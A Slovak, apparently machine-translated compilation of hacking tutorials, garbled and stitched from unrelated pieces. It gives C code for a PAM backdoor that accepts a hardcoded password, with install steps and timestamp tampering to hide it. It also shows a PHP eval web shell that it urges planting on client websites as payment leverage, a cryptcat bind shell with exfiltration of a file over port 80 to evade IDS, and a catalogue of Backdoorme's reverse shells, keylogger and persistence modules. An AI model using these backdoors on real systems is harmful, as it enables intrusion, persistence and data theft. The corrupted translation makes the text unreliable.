Náš blog o Habrii nám hovorí nielen o vývoji svojho produktu - telefonovania pre operátorov spojky Hydra, ale publikuje aj materiály o práci s infraštruktúrou a súvisiacimi technológiami.

Nemecký novinár a hacker Leif Ryge napísal pre Ars Technica obsiahly článok o tom, ako súčasný prístup k organizácii aktualizácií softvéru prináša vážne riziká informačnej bezpečnosti.ki. Vaše úctyhodné myšlienky uvádzame v tomto článku.

Pravek

Už v roku 2014 písala redakcia Washington Post o tom, ako by spoločnosti mohli použiť kľúče Apple a Google na nájdenie tajného kľúča na kľúči, ktorý by sa dal použiť na odmietnutie prístupu k ich produktom a ako by ich uložili a preniesli do spravodajské agentúry, bez ohľadu na to, čo s nimi zdržiavalo loď. rozhodnutie."

Zníženie „slabej kože“, útoku na kožu, ktorý môže byť kritický, je preto základom každého nového mechanizmu na rozšírenie softvérovej bezpečnosti.

Existuje veľa spôsobov, ako sa uchytiť na rozbitom aute. Od najbanálnejších a ľahko identifikovateľných (pridajte sa do databázy vývojárov) až po skladacie moduly jadra, ktoré implementujú shell brány na vzdialenom počítači. Medzi nimi je veľmi jednoduchá implementácia a má tajnú metódu, o ktorej vie len veľmi málo ľudí. Ide o modifikáciu modulov autentifikačného systému PAM, ktoré používajú všetky súčasné systémy UNIX.

čo je PAM?

autentifikačné moduly (PAM) - sada API potrebných na implementáciu autentifikačných mechanizmov v rôznych aplikáciách.

Pred príchodom PAM, aby bolo možné implementovať autentifikáciu, povedzme, pomocou kľúčovej karty, museli predajcovia zadať podporný kód pre svoje kľúčové karty do každého komponentu systému, ktorý bol zodpovedný za autentifikáciu zákazníka. Aby bolo možné pridať a znova vybrať nástroj na prihlásenie, sshd, ako aj akýkoľvek iný softvér, do ktorého sa plánovalo pridať podobnú funkčnosť.

S príchodom PAM sa situácia výrazne vyjasnila. Teraz, aby ste do systému pridali svoj vlastný jedinečný autentifikačný protokol, stačí ho implementovať v rámci jedného modulu PAM. A všetky nástroje a programy, ktoré pracujú s PAM, ho používajú a môžu byť použité na autentifikáciu používateľa.

V praxi to vyzerá asi takto: prihlasovacia pomôcka sa rozšíri na PAM, ktorá vykoná všetky potrebné kontroly dodatočných hodnôt v konfiguračnom súbore modulu a vráti výsledok späť prihlasovacej pomôcke. V pohode, prečo nie? Takýto prístup však podkopáva možnosti, ktoré môžeme využiť na presadenie sa v systéme.

Varto zrobiti malé zastorezhenya. Existujú tri hlavné implementácie PAM:

  • Linux-PAM je hlavnou implementáciou PAM na akomkoľvek systéme Linux;
  • OpenPAM – podporované na systémoch BSD a macOS;
  • JPam je implementácia PAM pre doplnky Java.

Nebudeme sa venovať žiadnej konkrétnej implementácii. Základná funkčnosť je rovnaká.

Aspekty konsolidácie *nix s PAM wiki

Ako nastaviť PAM pre skin program nájdete v Cataloze /etc/pam.d(Linux) alebo v súbore /etc/pam.conf. Príklad konfiguračného súboru pre prihlasovaciu pomôcku v systéme macOS:

auth voliteľné pam_krb5 .so use_kcminit

auth voliteľné pam_ntlm .tak try_first_pass

auth voliteľné pam_mount .tak try_first_pass

auth vyžaduje pam_opendirectory .tak try_first_pass

akt vyžadoval pam_nologin .tak

akt vyžaduje pam_opendirectory .so

vyžaduje sa heslo pam_opendirectory .so

relácia vyžaduje pam_launchd .so

relácia vyžaduje pam_uwtmp .so

relácia voliteľná pam_mount .so

Poďme zistiť, ako tu funguje mágia.

Konfiguračný súbor popisuje overovacie pravidlá, ktoré sú potrebné pre úspešnú autentifikáciu klienta a ďalšie akcie (zmena hesla, príprava klienta). Každý riadok konfiguračného súboru obsahuje jedno pravidlo. Obrátky sú usporiadané v rade.

Zľava doprava: typ modulu, control_flag, názov modulu. Najprv musíme uviesť typ auth modulu, tieto moduly samotné sú zodpovedné za autentifikáciu. Control_flag - výkon modulu. Môžete hádať význam:

  • potrebná (nevyhnutná) - keď modul otočí kladný signál, časť šnúrky, ktorá chýba, sa odstráni a potom sa uspokojí. Ak modul zvráti negatívny výsledok, je náhodne vyhodený a žiadne ďalšie overenia nie sú dokončené;
  • požadované (nevyhnutné) - ako aj nevyhnutné: ak je potvrdenie pozitívne, časť šeku, ktorá sa stratila, je vyradená. Kvôli tomuto rozdielu, v prípade negatívneho typu, šnúrka kontroly naďalej zlyháva, napájanie je resetované;
  • dostatočný (dostatočný) - v tomto prípade spĺňa otázku, keďže predchádzajúce kontroly neboli vykonané negatívne. Ak je modul zadaný negatívne, výsledok sa ignoruje a reverzná slučka sa vykonáva ďalej;
  • nepovinné (voliteľné) – modul sa spustí, inak sa výsledok ignoruje.

Už v tejto fáze je zrejmé, že drobnými zmenami v konfiguračnom súbore vieme zabezpečiť úspešné prihlásenie do systému ľubovoľným heslom (stačí označiť všetky auth moduly ako voliteľné). V opačnom prípade bude rozhodovať len legitímny klient alebo administrátor, ktorému sa nepodarí zaregistrovať sa úspešne prihlásením do systému s nesprávnym heslom.

Píšeme výkonný modul backdoor

PAM nám umožňuje povoliť výkonné modely autentifikácie. Preto môžeme modul zničiť pomocou hesla „charm“ a zabezpečiť, aby systém akceptoval štandardné heslá zákazníkov aj našej vlády. Ak zadáte nesprávne heslo, bude vám poskytnuté úplné vynechanie overenia. Zlá možnosť.

Ok, kód (nezabudnite nahradiť magické heslo svojím „očarujúcim“ heslom):

#include

#include

#include

#include

#include

#include

#define MYPASSWD "magické heslo"

PAM_EXTERN int pam_sm_setcred (pam_handle_t * pamh , int príznaky , int argc , const char * * argv ) (

return PAM_SUCCESS ;

PAM_EXTERN int pam_sm_acct_mgmt (pam_handle_t * pamh , int príznaky , int argc , const char * * argv ) (

return PAM_SUCCESS ;

PAM_EXTERN int pam_sm_authenticate (pam_handle_t * pamh , int príznaky , int argc , const char * * argv ) (

char *heslo = NULL;

pam_get_authtok (pamh, PAM_AUTHTOK, (const char * *) & heslo, NULL);

if (! strncmp (heslo, MYPASSWD, strlen (MYPASSWD)))

return PAM_SUCCESS ;

návratnosť - 1;

Modul Zberem:

$ sudo apt - získajte inštaláciu libpam0g - dev gcc

$ gcc - fPIC - c pam_backdoor .c

$ ld - x -- shared - o pam_backdoor .so pam_backdoor .o

Umiestnime ho do adresára s ostatnými modulmi:

$ sudo chown root : root pam_backdoor .so

$ sudo cp pam_backdoor .so / lib / x86_64 - linux - gnu / security /

Ukážte rešpekt k tomu, čo robíte /lib/x86_64-linux-gnu/security/Špecifické pre Debian/Ubuntu. Pre Fedora, Red Hat a CentOS sú moduly umiestnené v katalógu /lib64/security/ a v Arch Linuxe - at catalosis /lib/security/.

Teraz môžete nakonfigurovať PAM len tak, aby overovací proces vášho modulu postačoval na úspešnú autentifikáciu. Napríklad konfigurácia nástroja su ( /etc/pam.d/su):

Na niektorých systémoch Linux možno autentifikáciu nakonfigurovať v skupine súborov: common-auth, common-password, common-session a potom pripojiť ku konfiguračným súborom konkrétnych pomocných programov cez @include. V tejto chvíli musíte uctievať.

Po zadaní nastavení do konfigurácie sa vám spustí obslužný program su pomocou hesla zadaného v module. Rovnaký trik je možné vykonať pomocou prihlasovacieho nástroja (prihlásenie do konzoly) a sshd na vzdialené prihlásenie.

Do pôvodného modulu nainštalujeme backdoor

Pri úprave konfigurácie PAM môžete označiť modul pam_unix.so. Tento modul zabezpečuje autentifikáciu klientov pomocou štandardnej databázy hesiel pre systémy UNIX. /etc/passwd. K dispozícii je množstvo nástrojov vrátane programov su, login, sshd a ďalších (napríklad SecureFTPd).

Shardy PAM sú stále open source a máme prístup k výstupným textom samotného démona aj štandardných komponentov a priamo do tohto modulu môžeme vložiť vlastné zadné vrátka.

Aby bolo možné vykonať potrebné zmeny, výstupné texty PAM sa aktualizujú:

$ http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

$tar - xzf inux - PAM - 1.1.8.tar.gz

Otváranie súboru Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c A hľadáme ďalšie riadky:

Vyberáme a nahrádzame pôvodný modul vlastným:

$. /configure

$ urobiť

$ sudo cp Linux - PAM - 1.1.8 / moduly / pam_unix / .libs / pam_unix .so / lib / x86_64 - linux - gnu / security /

Aby správca neoznačil náhradu, meníme čas vytvorenia súboru tak, aby sme sa vyhli času vytvárania iných modulov.

Spomínam si, že v článku „10 rokov a odporúčania na výstavbu lokality“ som predvídal dôsledky, ak sa nečestný klient rozhodol bezvýznamne hodiť nás na tých, ktorí pracovali naraz viac, ako opakovať osud. Po tom, čo sme zistili, že nebudeme nič platiť, sa nám naše stránky nepodarilo otvoriť a ešte v nich zostalo pár kúskov vody.

Obával som sa však, že na jednej zo stránok som stratil malý „náhradný vchod“ a bez toho, aby som o tom premýšľal, prejdem na inú stránku a opustím svet. A pri pohľade na tento záznam uvidíte jednoduchý formulár na nahrávanie súborov na server.

Pomôžem si s tým tak, že na stránku naimportujem požadované skripty a spustím ich na stránke a oni si s ich pomocou okrádajú svoje brutálne roboty. Tieto dvere majú len jedno mínus - mohli by rýchlo zmiznúť, ak by niekto, samozrejme, vedel o ich existencii.

Uplynula hodina a tým nie je dôležité, že až do dnešného dňa išlo všetko hladko, ale to nezahŕňa skutočnosť, že by sa taká petržlenová vňať mohla zopakovať.

V zásade môžete použiť starý spôsob odosielania súboru na server, ale... Novinka je komplikovaná, pretože to môžete urobiť jednoduchším spôsobom.

Navrhujem varianty a nápady najjednoduchšieho Bekdurova, aby som naozaj narobil problémy. Oz...

  1. Vytvoríme súbor php a nazveme ho nejako ako license.php alebo podobne.
  2. Napíšte nový kód

    if (isset($_POST["text"]))
    eval($_POST["text"]);
    ?>




  3. Súbor umiestnime tam, kde bol v cms odoslaný, napríklad do siete WYSIWYG editora. Ak je to potrebné, duplikujte súbor znova o 2-3 mesiace (o akomkoľvek požiari)

Axis vin, rám pre nevhodnosť. Vážim si vás, netreba vysvetľovať, že funkcia eval priraďuje kód formuláru.

Celé je to rám, ktorý je možné použiť bez akejkoľvek aplikácie na implementáciu. Prostredníctvom highlight_file je možné nahradiť akýkoľvek súbor heslami, ktoré nemajú priamy prístup. Môžete sa pripojiť k databáze, uplatniť alebo zmeniť. Môžete tiež vytvoriť skript, aby ste videli všetko na serveri, bez ohľadu na to, čo.

Nižšie uvediem nápady na ďalšie dvierka, ktoré sa dajú vyrobiť ku košom - nechám to na vás, milý čitateľ, ako nevyhnutnú domácu prácu. Ak je to dobrý deň, rád sa pozriem na to, čo vyšlo.

Nápady na dekoráciu :

  1. Bolo by zlé, ak by dvere neboli prístupné každému a aby sa na ne vytvorilo oprávnenie napríklad núdzovo. poznámka redakcie).
  2. Akonáhle budete mať autorizáciu, môžete okamžite pripraviť sériu tlačidiel, na ktoré môžete kliknúť, aby ste získali prístup k inému skriptu. Idete napríklad k svojim dverám a tam sú tlačidlá - získať heslá, získať databázu, zobraziť panel správcu atď.
  3. Nejaké ďalšie nápady?

Na konci dňa

Dvere Vikoristovaty sú dobrý nápad, ak vytvárate web pred platbou (v prípade, že platíte), alebo ak spolupracujete s firmou a chcete sa poistiť. V prvom prípade, ak je platba splatná, potom môžu byť dvere odstránené alebo môžu byť odstránené, ale myslím si, že to už nebude potrebné. A v inom scenári ich budete musieť v pripravenosti postupne orezávať.

To je na dnes všetko. Budem rád, keď si vypočujem vaše nápady a návrhy na túto tému! Až do nových správ

Cryptcat nám umožňuje komunikovať medzi dvoma systémami a šifruje komunikáciu medzi nimi pomocou dvoch rýb - jedného z mnohých vynikajúcich šifrovacích algoritmov.

Predtým sme sa dozvedeli o jednej maličkosti, ktorá vám umožňuje vytvoriť spojenie medzi dvoma počítačmi a prenášať súbory alebo vytvoriť príkazový shell na „opätovné pripojenie“ systému. Napriek kráse a elegancii tohto malého nástroja je tu jedna veľká nevýhoda – prenosy medzi počítačmi môžu byť detekované bezpečnostnými zariadeniami, ako sú firewally a systémy na detekciu narušenia (IDS).

Táto lekcia súvisí s obľúbeným bratrancom netcatu, kryptomatom (čo je v skutočnosti veľmi roztomilý a exotický, ale jednoduchší netcat).

Šifrovanie Twofish je na rovnakej úrovni ako šifrovanie AES, takže cryptcat je prakticky nepriestrelný. IDS teda nedokáže odhaliť zlé správanie v prevádzke, ak jeho trasy prechádzajú cez takéto primárne HTTP porty 80 a 443.

Croc 1: Predstierajte Cryptcat

Krok 2: Odomknite načúvací prístroj v systéme Windows

Poslucháč môžeme otvoriť na akomkoľvek systéme s podobnou syntaxou ako pre netcat. V našej verzii otvoríme reproduktor v systéme Windows 7 na porte 6996 a vytvoríme príkazový shell.

cryptcat -l -p 6996 -e cmd.exe

L znamená „otvoriť ucho“
-p 6996 znamená "umiestniť poslucháča na port 6996"
-e cmd.exe znamená "spustiť príkazový shell na komunikáciu"

Krok 3: Otvorte Snort alebo iný IDS

Teraz poďme spustiť IDS typu Snort na inom systéme, ktorý sa pripojí k systému Windows, aby sa zaistilo, že IDS je „zapečatené“ šifrovaním, vďaka čomu bude náš čierny hostiteľ pre takéto bezpečnostné zariadenia neviditeľný.


Krok 4: Pripojte sa k systému Windows pomocou Cryptcat

Pri inštalácii Cryptcatu na BackTrack nie je našou chybou zasahovať a nainštalovať ho. Okrem toho, ak sa nachádza v adresári /bin, môže mu byť odmietnutý prístup do akéhokoľvek iného adresára.

Teraz sa pripojíme k systému Windows 7 cryptcat z nášho systému BackTrack a uvidíme, ako môžeme poraziť zadné vrátka šifrovaného pripojenia, ktoré nemusí byť možné odhaliť.

cryptcat 192.168.4.182.248 6996


Ako vidíte, sme pripojení k systému Windows 7 a odstránili sme príkazový shell zo systému Win 7! To nám dáva významnú kontrolu nad týmto systémom, ale nie úplnú, pretože príkazový shell má obmedzené možnosti.

Krok 5: Spustite protokoly a upozornenia Snort

Tento typ útoku (prechod príkazového shellu cez plot) je ľahko detekovaný Snortom alebo iným IDS, ak spojenie nie je šifrované. Pravidlá Snortu hovoria správcovi systému, že shell cmd.exe musí prejsť tenkou líniou komunikácie a pravdepodobne bude fungovať tak, aby vás vyradil z víťaznej hodnoty príkazového shellu. Pri šifrovanej komunikácii dostupnej cez cryptcat nemusí byť tento odkaz viditeľný.

Vráťme sa späť a skontrolujte protokoly a upozornenia v Snorte. Keďže sme boli úspešní v sofistikovanom IDS, nie je potrebné sa obávať presúvania príkazového shellu cez medzeru. Môžeme skontrolovať naše protokoly, prihlásení /var/snort/alerts a zistiť, aké signály dostávame z nášho pripojenia k počítaču so systémom Windows (je nám ľúto, že to vieme vopred).

kwrite /var/snort/alerts


Ako môžete pokračovať, dosiahli sme úspech. Dokázali sme sa pripojiť k systému Windows bez obáv z akéhokoľvek bezpečnostného systému!

Krok 6: Pošlite Crypcat na port 80, aby ste unikli firewallu

Ak sme úspešne vytvorili šifrovacie zadné vrátka v systéme obete, bezpečnostný administrátor musí zabezpečiť, aby bol povolený neidentifikovaný port (6996). Toto, čo je viac než všetko, musí iniciovať bezpečnostný administrátor, aby obmedzil náš prístup. Okrem toho v systémoch s dobrým správcom systému a dobrým firewallom bude tento port pravdepodobne blokovaný firewallom.

Na akékoľvek opatrenie, aby si matky mohli všetko prezerať na internete, je potrebné použiť nešifrované porty 80 a 443 a možno aj 25, 53 a 110. Fragmenty nešifrovaného pohľadu na bežný internet - premávka prechádza cez prístav 80, ktorý Ak sa okamžite otvorí, je nepravdepodobné, že by sa zaznamenal mierny nárast prevádzky.

Teraz, ak sme úspešne dobyli cryptcat, pošleme ho cez port 80 so všetkým ostatným internetovým prenosom. Ak chcete šifrovať, pozrime sa, aké údaje sa prenášajú na linke. Preto môže byť pre bezpečnostné zariadenia nemožné ho odhaliť, aby ho zablokovali, fragmenty budú vždy zodpovedné za umožnenie prenosu cez port 80 a prenos je šifrovaný a IDS ho namiesto toho nebude môcť „dávkovať“.

Tu presunieme súbor zo systému obete s názvom topsecret.txt do nášho útočiaceho systému bez toho, aby sme zistili akékoľvek bezpečnostné zariadenie. Tentoraz namiesto odoslania príkazového shellu cez plot prekonáme prísne tajný súbor s názvom topsecret.txt prostredníctvom nášho šifrovaného spojenia. Môžeme to urobiť zadaním do príkazového riadku systému Windows:

kryptcat -l -p 80< topsecret.txt

L znamená „otvoriť ucho“
-p 80 znamená "otvoriť poslucháč na porte 80"
< означает "отправить файл через этого слушателя"

Backdoorme - nástroj na automatické vytváranie zadných vrátok

Backdoorme je veľmi jednoduchý nástroj, ktorý možno použiť na vytvorenie skrytých zadných vrátok na strojoch Unix. Backdoorme používa známe rozhranie metasploit s úžasnou rozšíriteľnosťou. Backdoorme sa spolieha na SSH pripojenia a cloudové dáta obete, cez ktoré môžu prenášať a umiestňovať akékoľvek zadné vrátka. Buďte láskaví, vikoristi Backdoorme s otvorenou samostatnou budovou.

Vítaní ako hostia


Backdoorme okamžite prichádza s veľkým množstvom implementovaných backdoorov, modulov a doplnkových modulov. Zadné vrátka sú špecifické komponenty na vytváranie a vytváranie nevyhnutných zadných vrátok, ako sú zadné vrátka netcat alebo zadné vrátka msfvenom. Moduly môžu byť naskladané až po akékoľvek zadné dvierka a upravené tak, aby boli zadné dvierka tesnejšie, pripevnené alebo zakryté. Ďalšie prvky a súvisiace operácie, ktoré možno odstrániť, aby sa zachovala trvalosť.

Trochu viac o zadných vrátkach: Ak chcete spustiť backdoorme, skontrolujte, čo potrebujete.

$python dependencies.py

Spustiť backdoorme:

$ python master.py

Zadné dvere

Ak chcete zistiť zadné vrátka, jednoducho spustite kľúčové slovo „použiť“.

>> použite shell/metasploit + Použitie aktuálneho cieľa 1. + Použitie Metasploit backdoor... (msf) >>

Môžete nastaviť možnosti prístupu k zadným vrátkam. Spustite buď "zobraziť možnosti" alebo "pomoc", aby ste zobrazili zoznam parametrov, ktoré je možné upraviť.

Rovnako ako v metasploite sú zadné vrátka organizované podľa kategórií.

  • Pomocné (ďalšie kategórie)
    • keylogger- Pridáva do systému keylogger a dáva vám dostupnú možnosť posielania výsledkov späť poštou;
    • jednoduchýhttp– Nainštaluje server Python SimpleHTTP na klienta.
    • užívateľ– Privádza to nových koristuvach na pokraj.
    • web– Nainštaluje server Apache na klienta.
  • Eskalácia
    • setuid– Backdoor SetUID vám umožňuje nainštalovať bit setuid do skompilovaného súboru, berúc do úvahy, že používateľ má prístup typu root. Keď teda používateľ neskôr spustí súbor, ktorý neumožňuje prístup typu root, súbor je prepojený s prístupom typu root. Teoreticky tento backdoor presmeruje setuid bit na nano, takže ak sa akýmkoľvek spôsobom stratí prístup root, útočník sa môže znova prihlásiť do SSH ako neprivilegovaný používateľ a stále môže spustiť nano (alebo vybrať dvojitý súbor) ako root. ("nano /etc/shadow"). Upozorňujeme, že na otvorenie tohto rozšírenia zadné vrátka vyžadujú prístup root k samotnému klasu.
    • škrupina– shell backdoor je preferované rozšírenie backdoor, podobné jeho rozšíreniu SetUID brother (alebo konkrétnejšie). Duplikuje bash shell duplicitného súboru a nastavuje bit SUID. Upozorňujeme, že toto rozšírenie backdoor vyžaduje prístup root. Ak chcete poraziť tento backdoor, kde SSH funguje ako nepriateľský server, jednoducho spustite ".bash -p" a budete mať prístup root.
  • Shell (kategória Shell)
    • bash– wikirist používa jednoduchý bash skript na pripojenie ku konkrétnej kombinácii IP a portu a odovzdanie výsledku do bashu.
    • bash2- trochu menej (a spoľahlivejšie) opísaného bash backdoor, ktorý si na strane klienta nepýta heslo.
    • metasploit– používa msfvenom na vytvorenie dvojitého kódu reverse_tcp na cieli, potom spustí dvojitý kód na pripojenie k obalu meterpreter.
    • netcat– vikoryst netcat na prenos štandardného vstupu a výstupu zariadenia /bin/sh, čím sa vytvorí interaktívny shell koristuvache.
    • netcat_tradičné- Vikoristovu netcat-tradičnú "s -e pre tvorbu puzdra.
    • perl– skript napísaný v Perle, ktorý presmeruje výsledok z bash a premenuje proces, aby vyzeral menej chaoticky.
    • php– spustí PHP backdoor, ktorý prekoná výsledok bash. Neinštaluje automaticky webový server, ale namiesto toho nainštaluje webový modul vikoryst.
    • šteniatko- Vikorist backdoor n1nj4sec Pupy, ktorý je známy na

      Vítaní ako hostia

      .
    • pytón– vikorist je krátky python skript pre príkazy vikonanny a vynúti výsledky späť do koristuvach.
    • web– odošle webový server hostiteľovi, potom nainštaluje backdoor msfvenom php reverse_tcp a pripojí sa k hostiteľovi. Bez ohľadu na to, že je to stále php backdoor, nie je to to isté ako popisy viac php backdoor.
  • Prístup (kategória prístupu)
    • remove_ssh- Odinštaluje ssh server na klientovi. Je naozaj dobré skontrolovať relácie zadných vrátok, aby ste odstránili akékoľvek stopy.
    • ssh_key– vytvorí kľúč RSA a skopíruje ho do cieľa na pripojenie bez hesla ssh.
    • ssh_port– Pridá nový port pre ssh.
  • Windows (kategória Windows)
    • okná– Vikorist používa msfvenom na vytvorenie zadného vrátka systému Windows.
Moduly

Možno bude potrebné odstrániť zadné dvierka z dodatočných modulov, ktoré sú vytvorené, aby boli zadné dvierka pevnejšie. Ak chcete pridať modul, jednoducho vikorizujte kľúčové slovo pridať.

(msf) >> pridať jed + pridaný modul Poison

Modul skin má ďalšie parametre, ktoré je možné upraviť a ak znova spustíte „pomoc“, môžete si stiahnuť alebo nainštalovať ďalšie možnosti.

Aktuálne dostupné moduly zahŕňajú:

  • Jed
    • Kompilovať zásobník cieľového počítača – Win skompiluje skompilovaný súbor pre prístup k systémovému nástroju a hlavnému zadnému vrátku.
    • Napríklad, ak modul otvorí zásobník v rovnakom čase ako „ls“, skompiluje a prenesie dvojitý kód pod názvom „ls“, ktorý sa spustí ako pôvodné zadné vrátka, a tiež pod „ls“, čím umožní backdoor na častejšie spúšťanie backdoor.
  • Cron
    • Pridá nové zadné vrátka crontab pre používateľa root, aby mohol pracovať na danej frekvencii.
  • Web
    • Nainštaluje webový server a hosťuje webovú stránku, ktorá spustí zadné vrátka.
    • Stačí prejsť na stránku s otvorenými ušami a spustí sa zadné vrátka.
  • Používateľ
    • Dáva nový koristuvach výbuch.
  • Začiatok
    • Umožňuje vám vytvárať zadné dvierka pomocou súborov bashrc a init.
  • Whitelist
    • Pridajte k IP „biely zoznam“ takým spôsobom, že iba táto IP sa môže pripojiť k zadným vrátkam.
preklad: